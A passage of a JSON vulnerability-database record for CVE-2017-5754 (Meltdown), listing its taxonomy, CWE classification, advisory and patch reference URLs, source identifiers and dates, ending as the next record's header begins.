    "trust": 1.2946695793749998
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00303"
      }
    ]
  },
  "last_update_date": "2024-07-23T20:13:15.740000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "\u201cWith speculative execution function \u00a0CPU\u00a0 side-channel attacks against",
        "trust": 0.8,
        "url": "https://www.amd.com/en/corporate/speculative-execution"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001001"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.1
      },
      {
        "problemtype": "information leak (CWE-200) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-113957"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001001"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5754"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.0,
        "url": "http://www.kb.cert.org/vuls/id/584653"
      },
      {
        "trust": 2.2,
        "url": "https://meltdownattack.com/"
      },
      {
        "trust": 1.9,
        "url": "https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/security/vulnerabilities/speculativeexecution"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/102378"
      },
      {
        "trust": 1.6,
        "url": "https://vuls.cert.org/confluence/display/wiki/vulnerabilities+associated+with+cpu+speculative+execution"
      },
      {
        "trust": 1.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00115.html"
      },
      {
        "trust": 1.6,
        "url": "https://support.apple.com//ht208394"
      },
      {
        "trust": 1.6,
        "url": "http://www.dell.com/support/speculative-store-bypass"
      },
      {
        "trust": 1.4,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180104-cpusidechannel"
      },
      {
        "trust": 1.4,
        "url": "http://xenbits.xen.org/xsa/advisory-254.html"
      },
      {
        "trust": 1.4,
        "url": "https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/"
      },
      {
        "trust": 1.4,
        "url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv180002"
      },
      {
        "trust": 1.4,
        "url": "https://support.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03805en_us"
      },
      {
        "trust": 1.4,
        "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
      },
      {
        "trust": 1.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5754"
      },
      {
        "trust": 1.2,
        "url": "https://security.gentoo.org/glsa/201810-06"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/106128"
      },
      {
        "trust": 1.1,
        "url": "https://www.kb.cert.org/vuls/id/180049"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4609"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4611"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4613"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4614"
      },
      {
        "trust": 1.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2018-001.txt"
      },
      {
        "trust": 1.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2019-003.txt"
      },
      {
        "trust": 1.1,
        "url": "https://aws.amazon.com/de/security/security-bulletins/aws-2018-013/"
      },
      {
        "trust": 1.1,
        "url": "https://cdrdv2.intel.com/v1/dl/getcontent/685358"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-608355.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://cert.vde.com/en-us/advisories/vde-2018-002"
      },
      {
        "trust": 1.1,
        "url": "https://cert.vde.com/en-us/advisories/vde-2018-003"
      },
      {
        "trust": 1.1,
        "url": "https://help.ecostruxureit.com/display/public/uadce725/security+fixes+in+struxureware+data+center+expert+v7.6.0"
      },
      {
        "trust": 1.1,
        "url": "https://help.ecostruxureit.com/display/public/uadco8x/struxureware+data+center+operation+software+vulnerability+fixes"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20180104-0001/"
      },
      {
        "trust": 1.1,
        "url": "https://source.android.com/security/bulletin/2018-04-01"
      },
      {
        "trust": 1.1,
        "url": "https://support.citrix.com/article/ctx231399"
      },
      {
        "trust": 1.1,
        "url": "https://support.citrix.com/article/ctx234679"
      },
      {
        "trust": 1.1,
        "url": "https://support.f5.com/csp/article/k91229003"
      },
      {
        "trust": 1.1,
        "url": "https://support.lenovo.com/us/en/solutions/len-18282"
      },
      {
        "trust": 1.1,
        "url": "https://www.codeaurora.org/security-bulletin/2018/07/02/july-2018-code-aurora-security-bulletin"
      },
      {
        "trust": 1.1,
        "url": "https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-18-0001"
      },
      {
        "trust": 1.1,
        "url": "https://www.suse.com/c/suse-addresses-meltdown-spectre-vulnerabilities/"
      },
      {
        "trust": 1.1,
        "url": "https://www.synology.com/support/security/synology_sa_18_01"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4078"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4082"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4120"
      },
      {
        "trust": 1.1,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-18:03.speculative_execution.asc"
      },
      {
        "trust": 1.1,
        "url": "https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html"
      },
      {
        "trust": 1.1,
        "url": "https://security.googleblog.com/2018/01/todays-cpu-vulnerability-what-you-need.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/01/msg00004.html"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0292"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1040071"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00006.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00007.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00008.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00014.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00016.html"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/usn/usn-3516-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/usn/usn-3522-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3522-3/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3522-4/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3523-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/usn/usn-3523-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/usn/usn-3524-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/usn/usn-3525-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3540-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3541-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3583-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3597-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3597-2/"
      },
      {
        "trust": 1.1,
        "url": "http://jvn.jp/vu/jvnvu93823979/index.html"
      },
      {
        "trust": 1.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5715"
      },
      {
        "trust": 1.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5753"
      },
      {
        "trust": 1.0,
        "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03871en_us"
      },
      {
        "trust": 0.8,
        "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1528"
      },
      {
        "trust": 0.8,
        "url": "https://developer.amd.com/wp-content/resources/124441_amd64_speculativestorebypassdisable_whitepaper_final.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://www.us-cert.gov/ncas/alerts/ta18-141a"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/208.html"
      },
      {
        "trust": 0.8,
        "url": "https://software.intel.com/sites/default/files/managed/c5/63/336996-speculative-execution-side-channel-mitigations.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://software.intel.com/sites/default/files/managed/b9/f9/336983-intel-analysis-of-speculative-execution-side-channels-white-paper.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180521-cpusidechannel"
      },
      {
        "trust": 0.8,
        "url": "https://fortiguard.com/psirt/fg-ir-18-002"
      },
      {
        "trust": 0.8,
        "url": "https://support.hp.com/us-en/document/c06001626"
      },
      {
        "trust": 0.8,
        "url": "http://www.hitachi.com/hirt/publications/hirt-pub18001/"
      },
      {
        "trust": 0.8,
        "url": "https://www.ibm.com/blogs/psirt/potential-impact-processors-power-family/"
      },
      {
        "trust": 0.8,
        "url": "https://docs.microsoft.com/en-us/cpp/security/developer-guidance-speculative-execution"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/vulnerabilities/ssbd"
      },
      {
        "trust": 0.8,
        "url": "https://www.suse.com/support/kb/doc/?id=7022937"
      },
      {
        "trust": 0.8,
        "url": "https://www.synology.com/en-global/support/security/synology_sa_18_23"
      },
      {
        "trust": 0.8,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/variant4"
      },
      {
        "trust": 0.8,
        "url": "https://kb.vmware.com/s/article/54951"
      },
      {
        "trust": 0.8,
        "url": "https://aws.amazon.com/security/security-bulletins/aws-2018-015/"
      },
      {
        "trust": 0.8,
        "url": "cve-2017-5715  "
      },
      {
        "trust": 0.8,
        "url": "cve-2017-5753  "
      },
      {
        "trust": 0.8,
        "url": "cve-2017-5754  "
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu94630516/"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu99752892/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu98137233/"
      },
      {
        "trust": 0.8,
        "url": "https://www.us-cert.gov/ncas/alerts/ta18-004a"
      },
      {
        "trust": 0.8,
        "url": "https://kb.cert.org/vuls/id/155143"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-075-01"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-257-04"
      },
      {
        "trust": 0.8,
        "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01a"
      },
      {
        "trust": 0.8,
        "url": "http://blog.cyberus-technology.de/posts/2018-01-03-meltdown.html"
      },
      {
        "trust": 0.8,
        "url": "https://googleprojectzero.blogspot.jp/2018/01/reading-privileged-memory-with-side.html"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2017-5754"
      },
      {
        "trust": 0.6,
        "url": "https://www.bleepingcomputer.com/news/security/list-of-meltdown-and-spectre-vulnerability-advisories-patches-and-updates/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/errata/rhsa-2018:0008"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/errata/rhsa-2018:0016"
      },
      {
        "trust": 0.4,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "http://www.amd.com/en-gb"
      },
      {
        "trust": 0.3,
        "url": "https://www.arm.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.intel.com/content/www/us/en/homepage.html"
      },
      {
        "trust": 0.3,
        "url": "https://newsroom.intel.com/news/intel-responds-to-security-research-findings/"
      },
      {
        "trust": 0.3,
        "url": "https://lwn.net/articles/738975/"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10842\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "https://support.apple.com/en-us/ht208394"
      },
      {
        "trust": 0.3,
        "url": "https://www.chromium.org/home/chromium-security/ssca"
      },
      {
        "trust": 0.3,
        "url": "https://www.amd.com/en/corporate/speculative-execution"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2018-01-01"
      },
      {
        "trust": 0.3,
        "url": "https://lists.apple.com/archives/security-announce/2018/jan/msg00001.html"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1519781"
      },
      {
        "trust": 0.3,
        "url": "https://support.google.com/faqs/answer/7622138"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/spectre_meltdown_advisory.asc"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01c"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01e"
      },
      {
        "trust": 0.3,
        "url": "https://securityadvisories.paloaltonetworks.com/home/detail/120"
      },
      {
        "trust": 0.3,
        "url": "https://www.reddit.com/r/linux/comments/7npnd4/kernel_41411_is_out_with_patches_for_intel_cpu/"
      },
      {
        "trust": 0.3,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
      },
      {
        "trust": 0.3,
        "url": "https://www.oracle.com/technetwork/topics/security/ovmbulletinapr2018-4431088.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.bd.com/en-us/support/product-security-and-privacy/product-security-bulletin-for-meltdown-and-spectre-update-1"
      },
      {
        "trust": 0.3,
        "url": "https://googleprojectzero.blogspot.in/2018/01/reading-privileged-memory-with-side.html"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0007"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0009"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0010"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0011"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0017"
      },
      {
        "trust": 0.3,
        "url": "https://www.symantec.com/security-center/network-protection-security-advisories/sa161"
      },
      {
        "trust": 0.3,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-168644.pdf"
      },
      {
        "trust": 0.3,
        "url": "https://chromereleases.googleblog.com/2018/03/stable-channel-update-for-chrome-os_19.html"
      },
      {
        "trust": 0.3,
        "url": "https://lists.vmware.com/pipermail/security-announce/2018/000397.html"
      },
      {
        "trust": 0.3,
        "url": "https://www.vmware.com/security/advisories/vmsa-2018-0007.html"
      },
      {
        "trust": 0.3,
        "url": "https://developer.arm.com/support/security-update"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.3,
        "url": "http://www.qualcomm.com/"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2018-12-01.html"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2017-5753"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2017-5715"
      },
      {
        "trust": 0.1,
        "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbhf03871en_us"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-8897"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/pop_ss"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8897"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:1351"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4097"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4094"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4088"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4092"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-8817"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4098"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4093"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4096"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/downloads/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4090"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4091"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4085"
      },
      {
        "trust": 0.1,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4086"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4082"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4089"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4100"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17864"
      },
      {
        "trust": 0.1,
        "url": "https://www.ubuntu.com/usn/usn-3523-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17863"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16995"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17862"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.13.0-25.29"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3523-1,"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3541-1,"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.13.0-37.42"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.13.0-1015.16"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3597-1,"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0022"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5244"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7542"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12892"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10471"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12891"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12893"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10982"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15469"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10472"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3620"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10981"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15468"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3646"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15470"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7541"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7540"
      },
      {
        "trust": 0.1,
        "url": "https://www.microfocus.com/support-and-services/report-security"
      },
      {
        "trust": 0.1,
        "url": "https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification"
      },
      {
        "trust": 0.1,
        "url": "https://cf.passport.softwaregrp.com/hppcf/createuser.do"
      },
      {
        "trust": 0.1,
        "url": "https://softwaresupport.hpe.com/security-vulnerability"
      },
      {
        "trust": 0.1,
        "url": "https://softwaresupport.hpe.com/document/-/facetsearch/document/km03158629"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CERT/CC",
        "id": "VU#584653"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00303"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113957"
      },
      {
        "db": "BID",
        "id": "102378"
      },
      {
        "db": "BID",
        "id": "106128"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001001"
      },
      {
        "db": "PACKETSTORM",
        "id": "147543"
      },
      {
        "db": "PACKETSTORM",
        "id": "146067"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "145793"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "145658"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "150083"
      },
      {
        "db": "PACKETSTORM",
        "id": "147582"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5754"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CERT/CC",
        "id": "VU#584653"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00303"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113957"
      },
      {
        "db": "BID",
        "id": "102378"
      },
      {
        "db": "BID",
        "id": "106128"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001001"
      },
      {
        "db": "PACKETSTORM",
        "id": "147543"
      },
      {
        "db": "PACKETSTORM",
        "id": "146067"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "145793"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "145658"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "150083"
      },
      {
        "db": "PACKETSTORM",
        "id": "147582"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5754"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-05-21T00:00:00",
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "date": "2018-01-04T00:00:00",
        "db": "CERT/CC",
        "id": "VU#584653"
      },
      {
        "date": "2018-01-04T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-00303"
      },
      {
        "date": "2018-01-04T00:00:00",
        "db": "VULHUB",
        "id": "VHN-113957"
      },
      {
        "date": "2018-01-03T00:00:00",
        "db": "BID",
        "id": "102378"
      },
      {
        "date": "2018-12-03T00:00:00",
        "db": "BID",
        "id": "106128"
      },
      {
        "date": "2018-01-04T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-001001"
      },
      {
        "date": "2018-05-08T23:54:17",
        "db": "PACKETSTORM",
        "id": "147543"
      },
      {
        "date": "2018-01-24T16:59:41",
        "db": "PACKETSTORM",
        "id": "146067"
      },
      {
        "date": "2018-01-04T01:20:35",
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "date": "2018-01-10T00:58:04",
        "db": "PACKETSTORM",
        "id": "145793"
      },
      {
        "date": "2018-03-15T15:54:32",
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "date": "2018-01-04T17:52:00",
        "db": "PACKETSTORM",
        "id": "145658"
      },
      {
        "date": "2018-01-04T17:53:07",
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "date": "2018-10-31T01:14:40",
        "db": "PACKETSTORM",
        "id": "150083"
      },
      {
        "date": "2018-05-10T23:27:00",
        "db": "PACKETSTORM",
        "id": "147582"
      },
      {
        "date": "2018-01-04T13:29:00.303000",
        "db": "NVD",
        "id": "CVE-2017-5754"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-06-19T00:00:00",
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "date": "2022-01-07T00:00:00",
        "db": "CERT/CC",
        "id": "VU#584653"
      },
      {
        "date": "2018-01-11T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-00303"
      },
      {
        "date": "2021-11-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-113957"
      },
      {
        "date": "2019-04-17T07:00:00",
        "db": "BID",
        "id": "102378"
      },
      {
        "date": "2018-12-03T00:00:00",
        "db": "BID",
        "id": "106128"
      },
      {
        "date": "2024-04-11T06:49:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-001001"
      },
      {
        "date": "2021-11-19T18:15:08.547000",
        "db": "NVD",
        "id": "CVE-2017-5754"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "102378"
      },
      {
        "db": "PACKETSTORM",
        "id": "145793"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "147582"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "CPU hardware utilizing speculative execution may be vulnerable to cache side-channel attacks",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "102378"
      }
    ],
    "trust": 0.3
  }
}

var-201310-0084
Vulnerability from variot

